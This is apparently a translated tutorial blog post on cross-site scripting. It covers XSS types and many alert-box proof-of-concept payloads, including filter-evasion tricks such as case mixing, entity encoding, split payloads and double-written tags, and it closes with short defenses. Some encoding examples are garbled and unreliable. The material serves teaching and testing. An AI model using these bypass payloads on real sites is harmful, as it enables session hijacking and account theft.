table of Contents
3. XSS test environment download
1. Use <> to construct HTML/JS
3. Generate your own event (html event)
4. Other labels and techniques
6. XSS deformation (must ask for interview)
5. Transcode label attribute values
7. Double write bypass single filter
1. XSS principle
XSS is called Cross-site scripting, which should have been abbreviated as CSS, but because of the same name as CSS (Cascading Style Sheets), it was renamed XSS. XSS is mainly based on js to complete malicious attacks. js can operate html, css and browsers very flexibly.
XSS injects the constructed code (JS) into the web page, and the browser interprets and runs this JS code to achieve the effect of a malicious attack. When the user visits the webpage injected by the XSS script, the XSS script will be extracted. The user's browser will parse this XSS code, which means that the user has been attacked. The simplest action for the user is to use the browser to surf the Internet, and there is a javascript interpreter in the browser, which can parse javascript, but the browser will not judge whether the code is malicious. In other words, the objects of XSS are users and browsers.
2. XSS hazards
- Steal various user accounts
- Steal user cookie information, pretend to be a user and enter the website
- Hijack user sessions and perform arbitrary operations
- Brush traffic, execute pop-up ads
- Spread worms
3. XSS test environment download
Through this practice environment, we will understand XSS, the download address, xss_test , after downloading, it can be accessed by placing it in the root directory of the website
Four. XSS classification
1. Reflective XSS
Reflected XSS is a non-persistent, parametric cross-site scripting. The JS code of the reflective XSS is in the parameters (variables) of the Web application, such as the reflective XSS of the search box. For the content we input will be output to the web page as it is, we can suspect whether there is a reflective xss.
For example, in the search box, we submitted the number 2323 along with the form, intercepted the data packet, and found that the data 2323 was submitted to xss.php, and the submitted data 2323 was output to the web page as it is. Continue to check the source code of xss.php.
In the source code of xss.php, we found that the statement we submitted was output to the web page as it is, and the language of PhP was used. Then we thought that the input was output to the web page without filtering. Then we can submit the JS code,
Submit a string of pop-up JS code, as follows <script>alert(/xss/)</script>. The program automatically executes the pop-up operation when encountering the js code, which leads to the occurrence of reflective XSS
This is the reflective XSS!!
2. Stored XSS
Stored XSS is persistent cross-site scripting. Persistence is reflected in the fact that the XSS code is not in a certain parameter (variable), but is written into a medium that can permanently store data such as a database or file. Stored XSS usually occurs in places such as message boards, where you leave a message at the location of the message board and write malicious code into the database.
If there is a stored xss in the message board, we inject the js code. At this time, we have only completed the first step, writing the malicious code into the database. Because of the JS code used by XSS, the running environment of the JS code is the browser, so the browser needs to load the malicious XSS code from the server to actually trigger the XSS (run code). At this point, we need to simulate the identity of the website backend administrator to check the message.
3. DOM type XSS
dom is the document object model. The attack payload modifies the DOM tree of the victim's browser page. Its special place is that the payload is executed by modifying the DOM tree locally in the browser, and will not be transmitted to the server, which makes DOM XSS more difficult to detect.
Enter DOM type XSS
It means to intercept the characters after "message=" and output them to the web page
Submit data?message=2021, the browser outputs the data we submitted
Check the source code at this time, the source code has not changed, and then check the element, with the data we submitted, verifying that the dom-type XSS attack mentioned above is the DOM tree of the victim's browser page.
The same can submit js code
Five. The structure of xss
1. Use <> to construct HTML/JS
Construct js tags
<script>alert(/xss/)</script>
2. Pseudo Agreement
javascript: js代码 伪协议的方式构造XSS
You can put the pseudo protocol in the hyperlink of the html
<a href="javascript:alert(/xss/)">touch me!</a> #点击超链接,即可触发XSS。
3. Generate your own event (html event)
"Event-driven" is a relatively classic programming idea. Many events (such as mouse movement, keyboard input, etc.) occur in the web page, and JS can respond to these events. So we can trigger JS functions and XSS through events.
单击事件
<input type="button" onclick ="alert(/xss/)" value="点我! ">
双击事件
<input type="button" ondblclick="alert(/xss/)" value="双击666">
悬停
<img src='./smile.jpg' onmouseover='alert(/xss/)'>
图片载入失败弹窗
<img src='#' onerror="alert(/xss/)">
按下键盘触发
<input type="text" onkeydown="alert(/xss/)">
4. Other labels and techniques
We can also use other tags to trigger XSS.
点击提交就弹窗
<svg onload="alert(/xss/)"> #svg是html5中新出的标签,也是一个事件
焦点 自动聚焦
<input onfocus=alert(/xss/) autofocus> #鼠标自动聚焦到这个标签然后进行弹窗
6. XSS deformation (must ask for interview)
Some web pages filter the XSS, but we can bypass the filter detection by deforming the XSS.
1. Case conversion
The payload is case-converted. As in the following two examples.
<Img sRc='#' Onerror="alert(/xss/)"/>
#alert是js语,所以只能转换img和src
<A hREf="javaScript:alert(/xss/)">click me</A>
We can submit these two statements for testing
2. Use of quotation marks
HTML language is not sensitive to the use of quotation marks. Double quotation marks, single quotation marks, or no quotation marks can be used for html
<img src="#" onerror="alert(/xss/)"/>
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />
3. / instead of spaces
You can use left slashes instead of spaces
<Img/sRc='#'/Onerror='alert(/xss/)' /> #alert(/xss/)使用斜线是为了尽量避免单引号的使用
<Img/sRc='#'/Onerror=alert('xss') />
<Img/sRc='#'/Onerror='alert(/AJEST/)' />
4. Enter
You can add Tab (horizontal tabs) and carriage returns in some places to bypass keyword detection.
<A hREf="j
avas
c
r
i
p
t:alert(/xss/)">click me!</a>
5. Transcode label attribute values
Transcode the tag attribute value to bypass filtering. The corresponding code is as follows
Letter ASCII code Decimal code Hexadecimal code
a 97 a a semicolon represents the end of encoding
e 101 e e
- ASCII encoding reference https://www.sojson.com/asciitable.html
- Hexadecimal encoding https://www.convertstring.com/zh_CN/EncodeDecode/HexEncode
- URL encoding https://www.w3school.com.cn/tags/html_ref_urlencode.html
For example, encode the tag attribute value of <A hREf="javaScript:alert(/xss/)">click me</A>, and encode a in decimal a and hexadecimal encodinga ; as follows
<A hREf="javaScript:alert(/xss/)">click me</A>
Click, the same pop-up window
In addition, we can also insert control characters such as carriage return, line feed, and horizontal tab in the code
For the meaning of control characters in ASCII, please refer to https://blog.csdn.net/sxdtzhp/article/details/50993571
Tab 	
Line break
Carriage return
SOH (The control character in ASCI. SOH is the Start Of Header, which indicates the beginning of the title, optional, and has no effect, just the beginning of the data stream)
STX #Beginning of text
What it looks like after encoding
<A hREf="j avas	c r ipt:alert(/xss/)">click me!</a>
6. Split cross-site
The core idea is to shorten a relatively long JS statement by splitting it across sites. Then submit them separately. For example, use <script>alert(/xss/)</script> for differential cross-site
HTML~~~~~~~~~~~~`
<script>z='alert'</script> #第一次提交
HTML~~~~~~~~~~~~`
<script>z=z+'(/xss/)'</script> #第二次提交
HTML~~~~~~~~~~~~`
<script>eval(z)</script> #第三次提交
You can leave a message three times. When these three messages are loaded on the same page at the same time, an XSS attack is triggered.
7. Double write bypass single filter
If you filter a character once, you can use double writing to bypass it. If the program filters the keyword <script>, then we can construct <sc<script>ript> to bypass the single filter.
Seven. XSS defense
1) Front-end, server-side, limit the length of string input.
2) Front-end, server-side, HTML escaping processing. Escape and encode special characters such as "<", ">". Replace characters with corresponding HTML entities
. The core of anti-XSS is to filter the input data.
3) The black and white list strategy, whether using input filtering or output coding, is a black|white list filtering for data information.
8. XSS-challenge
Pass the challenge of actual combat, portal-" XSS challenge of the xss-challenge
——Heart, if there is no place to live, it will be wandering everywhere